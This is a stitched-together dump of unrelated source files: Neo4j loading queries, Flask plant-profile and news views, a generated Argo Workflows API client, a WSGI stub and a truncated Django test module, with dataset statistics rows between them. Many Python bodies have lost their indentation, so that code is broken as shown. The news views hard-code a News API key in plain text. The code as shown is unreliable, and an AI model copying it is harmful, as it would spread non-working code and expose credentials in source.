# ===== python/query_changes.py — davidmeza1/ksat (MIT) =====
query_list = []  # initialization is missing from this fragment; added so the appends below run
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///TechnologySkills.csv' AS line
RETURN line
","
MATCH (o:Occupation {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Commodity {commodityID: toInteger(line.`Commodity Code`)})
MATCH (t:Technology_Skills {elementID: '5.F.1'})
SET m:Technology_Skills
REMOVE m:Commodity
MERGE (m)-[r:Sub_Element_Of]-(t)
MERGE (p:Tech_Skill_Product {title: line.Example})
ON CREATE SET p.hottech = line.`Hot Technology`
WITH o, m, p, line
MERGE (m)-[:Technology_Used_In]->(o)
MERGE (p)-[:Technology_Product]-(m)
",{batchSize:10000})""") #29370
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///TechnologySkills.csv' AS line
RETURN line
","
MATCH (o:Workrole {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Technology_Skills {commodityID: toInteger(line.`Commodity Code`)})
MERGE (p:Tech_Skill_Product {title: line.Example})
ON CREATE SET p.hottech = line.`Hot Technology`
WITH o, m, p, line
MERGE (m)-[:Technology_Used_In]->(o)
MERGE (p)-[:Technology_Product]-(m)
",{batchSize:10000})""") #29370
# Tools
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///ToolsUsed.csv' AS line
RETURN line
","
MATCH (o:Occupation {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Commodity {commodityID: toInteger(line.`Commodity Code`)})
MATCH (t:Tools {elementID: '5.G.1'})
SET m:Tools
REMOVE m:Commodity
MERGE (m)-[r:Sub_Element_Of]-(t)
MERGE (p:Tool_Product {title: line.Example})
ON CREATE SET p.hottech = 'N'
WITH o, m, p, line
MERGE (m)-[:Tools_Used_In]->(o)
MERGE (p)-[:Tool_Product]-(m)
",{batchSize:10000})""") #42278
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///ToolsUsed.csv' AS line
RETURN line
","
MATCH (o:Workrole {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Tools {commodityID: toInteger(line.`Commodity Code`)})
MERGE (p:Tool_Product {title: line.Example})
ON CREATE SET p.hottech = 'N'
WITH o, m, p,line
MERGE (m)-[:Tools_Used_In]->(o)
MERGE (p)-[:Tool_Product]-(m)
",{batchSize:10000})""") #42278
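The four statements above differ only in their inner Cypher; the `LOAD CSV` plus `apoc.periodic.iterate` batching scaffold is repeated verbatim each time. A minimal sketch of factoring it out (the helper name is hypothetical, not part of the original script):

```python
def batched_csv_query(csv_file, cypher, batch_size=10000):
    """Wrap a Cypher fragment in the apoc.periodic.iterate / LOAD CSV scaffold
    used by every query in query_list."""
    return (
        'CALL apoc.periodic.iterate("\n'
        'LOAD CSV WITH HEADERS\n'
        f"FROM 'file:///{csv_file}' AS line\n"
        'RETURN line\n'
        '","\n'
        f'{cypher}\n'
        f'",{{batchSize:{batch_size}}})'
    )
```

Each `query_list.append("""CALL apoc.periodic.iterate(...""")` above could then become `query_list.append(batched_csv_query("ToolsUsed.csv", inner_cypher))`, keeping the per-file Cypher as the only varying part.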
# ===== app/plant_profiles/views.py — hydrobase/core_app (MIT) =====
from flask import Blueprint, render_template, request, url_for, redirect
from app import db, login_manager, pubnub
from flask_login import login_required, current_user  # flask.ext.* was removed in Flask 1.0
mod_plant_profiles = Blueprint('plant_profiles', __name__)
@mod_plant_profiles.route('/plant_profiles/', methods=['GET'])
@mod_plant_profiles.route('/plant_profiles/<cur>/<first>', methods=['GET'])
# @mod_plant_profiles.route('/plant_profiles/<cur>/<first>/<shift>', methods=['GET'])
@login_required
def list_plant_profiles(cur=1, first=1):
search = False
num_profiles = db.plant_profiles.find().count()
skip = (int(cur)-1) * 8
lim = 8
    if num_profiles % lim == 0:
        pages = num_profiles // lim  # integer division; "/" would yield a float on Python 3
    else:
        pages = num_profiles // lim + 1
device_list = []
grows_list = []
plant_list =[]
username = current_user.get_id()
devices = db.devices.find({'username': current_user.get_id()})
for device in devices:
device_list.append((device['device_name'], device['type'], \
device['sensors'], device['actuators'], device['kit'], device['device_id']))
grows = db.grows.find({'username' : current_user.get_id()})
for grow in grows:
grows_list.append((grow['grow_name'], grow['device_name']))
plants = db.plant_profiles.find().skip(skip).limit(lim)
for plant in plants:
plant_list.append(plant)
return render_template('plant_profiles/plant_profiles.html', username=username, my_devices=device_list,\
my_grows=grows_list, my_plants=plant_list, pages=pages, cur=int(cur), first=int(first), search=search)
@mod_plant_profiles.route('/plant_profiles_next/<cur>/<first>', methods=['GET'])
@login_required
def next_plant_profiles(cur=1, first=1):
first = int(first) + 1
cur = int(cur) + 1
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_prev/<cur>/<first>', methods=['GET'])
@login_required
def prev_plant_profiles(cur=1, first=1):
first = int(first) - 1
if int(cur) > first+2:
cur = first+2
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_first', methods=['GET'])
@login_required
def first_plant_profiles():
first=1
cur=1
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_last', methods=['GET'])
@login_required
def last_plant_profiles():
num_profiles = db.plant_profiles.find().count()
lim = 8
    if num_profiles % lim == 0:
        pages = num_profiles // lim
    else:
        pages = num_profiles // lim + 1
first=pages-2
cur=pages
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/search_plant_profiles', methods=['GET'])
@login_required
def search_plant_profiles(cur=1, first=1, shift="no change"):
search = True
num_profiles = db.plant_profiles.find().count()
skip = (int(cur)-1) * 8
lim = 8
    if num_profiles % lim == 0:
        pages = num_profiles // lim
    else:
        pages = num_profiles // lim + 1
device_list = []
grows_list = []
plant_list =[]
username = current_user.get_id()
devices = db.devices.find({'username': current_user.get_id()})
for device in devices:
device_list.append((device['device_name'], device['type'], \
device['sensors'], device['actuators'], device['kit'], device['device_id']))
grows = db.grows.find({'username' : current_user.get_id()})
for grow in grows:
grows_list.append((grow['grow_name'], grow['device_name']))
plants = db.plant_profiles.find({"common_name": request.args.get('search')})
for plant in plants:
plant_list.append(plant)
return render_template('plant_profiles/plant_profiles.html', username=username, my_devices=device_list,\
my_grows=grows_list, my_plants=plant_list, pages=pages, cur=int(cur), first=int(first), search=search)
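The page-count arithmetic above (divide, then bump by one unless the division is exact) appears in three separate views. It is ordinary ceiling division, and a small helper (hypothetical, not in the original module) would express it once:

```python
def page_count(num_items: int, per_page: int = 8) -> int:
    """Number of pages needed to show num_items, per_page at a time.

    Ceiling division via negation: -(-n // d) rounds up for non-negative n.
    """
    return -(-num_items // per_page)
```

Each view could then use `pages = page_count(num_profiles)` instead of repeating the modulo branch.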
# ===== pysatMissions/methods/__init__.py — pysat/pysatMissions (BSD-3-Clause) =====
"""
pysatMissions.methods is a module that provides
the methods to interface with numerous empirical model packages
"""
from pysatMissions.methods import magcoord
from pysatMissions.methods import spacecraft
__all__ = ['magcoord', 'spacecraft']
# ===== app/main/views.py — Mel-001/News-API (MIT) =====
from flask import render_template
from newsapi import NewsApiClient
from . import main
@main.route('/')
def index():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="fox-news")
articles = topheadlines['articles']
# print(articles)
desc = []
news = []
img = []
url = []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
mylist = zip(news, desc, img, url)
return render_template('index.html', context= mylist)
@main.route('/bbc')
def bbc():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="bbc-news")
articles = topheadlines['articles']
desc = []
news = []
img = []
url=[]
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
mylist = zip(news, desc, img, url)
return render_template('bbc.html', context=mylist)
@main.route('/cbc')
def cbc():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="cbc-news")
articles = topheadlines['articles']
desc = []
news = []
img = []
url =[]
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
    mylist = zip(news, desc, img, url)
    return render_template('cbc.html', context=mylist)
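The three views above repeat the same unpack-and-zip loop over `topheadlines['articles']`. A sketch of a shared helper (the name and shape are hypothetical, assuming only the article fields the views already read) that reduces each view to a single call:

```python
def build_article_context(articles):
    """Map News API article dicts to (title, description, image, url) tuples,
    matching the zip the views pass to their templates."""
    return [
        (a.get('title'), a.get('description'), a.get('urlToImage'), a.get('url'))
        for a in articles
    ]
```

With this, each view could use `mylist = build_article_context(topheadlines['articles'])`, leaving only the news source and template name to vary.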
# ===== sdks/python/client/argo_workflows/api/artifact_service_api.py — argo-workflows (Apache-2.0) =====
"""
Argo Workflows API
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. For more information, please see https://argoproj.github.io/argo-workflows/ # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argo_workflows.api_client import ApiClient, Endpoint as _Endpoint
from argo_workflows.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from argo_workflows.model.grpc_gateway_runtime_error import GrpcGatewayRuntimeError
class ArtifactServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __get_artifact_file(
self,
namespace,
id_discriminator,
id,
node_id,
artifact_name,
artifact_name2,
artifact_discriminator="outputs",
**kwargs
):
"""Get an artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_file(namespace, id_discriminator, id, node_id, artifact_name, artifact_name2, artifact_discriminator="outputs", async_req=True)
>>> result = thread.get()
Args:
namespace (str):
id_discriminator (str):
id (str):
node_id (str):
artifact_name (str):
artifact_name2 (str):
artifact_discriminator (str): defaults to "outputs", must be one of ["outputs"]
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['id_discriminator'] = \
id_discriminator
kwargs['id'] = \
id
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
kwargs['artifact_discriminator'] = \
artifact_discriminator
kwargs['artifact_name2'] = \
artifact_name2
return self.call_with_http_info(**kwargs)
self.get_artifact_file = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/artifact-files/{namespace}/{idDiscriminator}/{id}/{nodeId}/{artifactDiscriminator}/{artifactName}',
'operation_id': 'get_artifact_file',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'id_discriminator',
'id',
'node_id',
'artifact_name',
'artifact_discriminator',
'artifact_name2',
],
'required': [
'namespace',
'id_discriminator',
'id',
'node_id',
'artifact_name',
'artifact_discriminator',
'artifact_name2',
],
'nullable': [
],
'enum': [
'id_discriminator',
'artifact_discriminator',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('id_discriminator',): {
"WORKFLOW": "workflow",
"ARCHIVED-WORKFLOWS_": "archived-workflows "
},
('artifact_discriminator',): {
"OUTPUTS": "outputs"
},
},
'openapi_types': {
'namespace':
(str,),
'id_discriminator':
(str,),
'id':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
'artifact_discriminator':
(str,),
'artifact_name2':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'id_discriminator': 'idDiscriminator',
'id': 'id',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
'artifact_discriminator': 'artifactDiscriminator',
'artifact_name2': 'artifactName',
},
'location_map': {
'namespace': 'path',
'id_discriminator': 'path',
'id': 'path',
'node_id': 'path',
'artifact_name': 'path',
'artifact_discriminator': 'path',
'artifact_name2': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_artifact_file
)
def __get_input_artifact(
self,
namespace,
name,
node_id,
artifact_name,
**kwargs
):
"""Get an input artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_input_artifact(namespace, name, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
name (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['name'] = \
name
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_input_artifact = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerToken'
],
'endpoint_path': '/input-artifacts/{namespace}/{name}/{nodeId}/{artifactName}',
'operation_id': 'get_input_artifact',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'name':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'name': 'name',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'name': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_input_artifact
)
def __get_input_artifact_by_uid(
self,
namespace,
uid,
node_id,
artifact_name,
**kwargs
):
"""Get an input artifact by UID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_input_artifact_by_uid(namespace, uid, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
uid (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['uid'] = \
uid
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_input_artifact_by_uid = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/input-artifacts-by-uid/{uid}/{nodeId}/{artifactName}',
'operation_id': 'get_input_artifact_by_uid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'uid',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'uid',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'uid':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'uid': 'uid',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'uid': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_input_artifact_by_uid
)
def __get_output_artifact(
self,
namespace,
name,
node_id,
artifact_name,
**kwargs
):
"""Get an output artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_output_artifact(namespace, name, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
name (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['name'] = \
name
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_output_artifact = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/artifacts/{namespace}/{name}/{nodeId}/{artifactName}',
'operation_id': 'get_output_artifact',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'name':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'name': 'name',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'name': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_output_artifact
)
def __get_output_artifact_by_uid(
self,
uid,
node_id,
artifact_name,
**kwargs
):
"""Get an output artifact by UID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_output_artifact_by_uid(uid, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
uid (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['uid'] = \
uid
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_output_artifact_by_uid = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerToken'
],
'endpoint_path': '/artifacts-by-uid/{uid}/{nodeId}/{artifactName}',
'operation_id': 'get_output_artifact_by_uid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'uid',
'node_id',
'artifact_name',
],
'required': [
'uid',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'uid':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'uid': 'uid',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'uid': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_output_artifact_by_uid
)
| 35.647713 | 206 | 0.436145 | 2,315 | 28,839 | 5.164579 | 0.086393 | 0.025092 | 0.023419 | 0.03011 | 0.874791 | 0.86375 | 0.849364 | 0.844179 | 0.834644 | 0.800268 | 0 | 0.002783 | 0.476785 | 28,839 | 808 | 207 | 35.691832 | 0.789582 | 0.2782 | 0 | 0.714783 | 0 | 0 | 0.229307 | 0.047275 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010435 | false | 0 | 0.008696 | 0 | 0.029565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
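Every generated endpoint wrapper above normalizes its optional keyword arguments with the same `kwargs['x'] = kwargs.get('x', default)` idiom before delegating to `call_with_http_info`. A minimal standalone sketch of that defaulting pattern (the `apply_defaults` helper is illustrative, not part of the generated client):

```python
def apply_defaults(kwargs, defaults):
    """Fill in missing keys, mirroring kwargs['x'] = kwargs.get('x', default)."""
    for key, value in defaults.items():
        kwargs[key] = kwargs.get(key, value)
    return kwargs

# Caller-supplied values win; unset options fall back to the endpoint defaults.
opts = apply_defaults(
    {'async_req': True},
    {'async_req': False, '_preload_content': True, '_request_timeout': None},
)
```

Note that the caller's `async_req=True` survives while the two unset options pick up their defaults, which is exactly how the generated wrappers behave.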
8384e02a6cb1a50677165593cb59c4ab065b159b | 101 | wsgi | Python | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.insert(0, "/opt/passwd_if")
from application.passwd_if import app as application | 25.25 | 52 | 0.80198 | 17 | 101 | 4.647059 | 0.705882 | 0.202532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.09901 | 101 | 4 | 52 | 25.25 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.666667 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
83a82a2ff441e23ffb496f847c3955f07784d272 | 20,206 | py | Python | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | import datetime as dt
from unittest.mock import patch
from pytz import utc
import requests
import requests_mock
from allianceauth.tests.auth_utils import AuthUtils
from ..models import Event, EventCategory, EventHost, EventImport
from .. import tasks
from .testdata import feedparser_parse, generate_ical_string
from ..utils import NoSocketsTestCase
MODULE_PATH = "opcalendar.tasks"
@patch(MODULE_PATH + ".feedparser")
@requests_mock.Mocker()
class TestImportNpsiFleet(NoSocketsTestCase):
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.user = AuthUtils.create_user("Bruce Wayne")
cls.eve_character = AuthUtils.add_main_character_2(
cls.user, "Bruce Wayne", 1001, 2001
)
cls.host = EventHost.objects.create(community="Test Host")
cls.category = EventCategory.objects.create(
name="NPSI", ticker="NPSI", color=EventCategory.COLOR_PURPLE
)
########################
# spectre fleets only
def test_should_add_new_spectre_fleet_event(self, mock_feedparser, requests_mocker):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Spectre Fleet 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.SPECTRE_FLEET)
self.assertEqual(obj.description, "")
published = utc.localize(dt.datetime(2021, 2, 5, 21, 0))
self.assertEqual(obj.start_time, published)
self.assertEqual(obj.end_time, published)
self.assertEqual(obj.fc, EventImport.SPECTRE_FLEET)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_spectre_fleet_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Spectre Fleet 1").exists())
def test_should_not_replace_existing_spectre_fleet_event(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
published = utc.localize(dt.datetime(2021, 2, 5, 21, 0))
original_event = Event.objects.create(
operation_type=self.category,
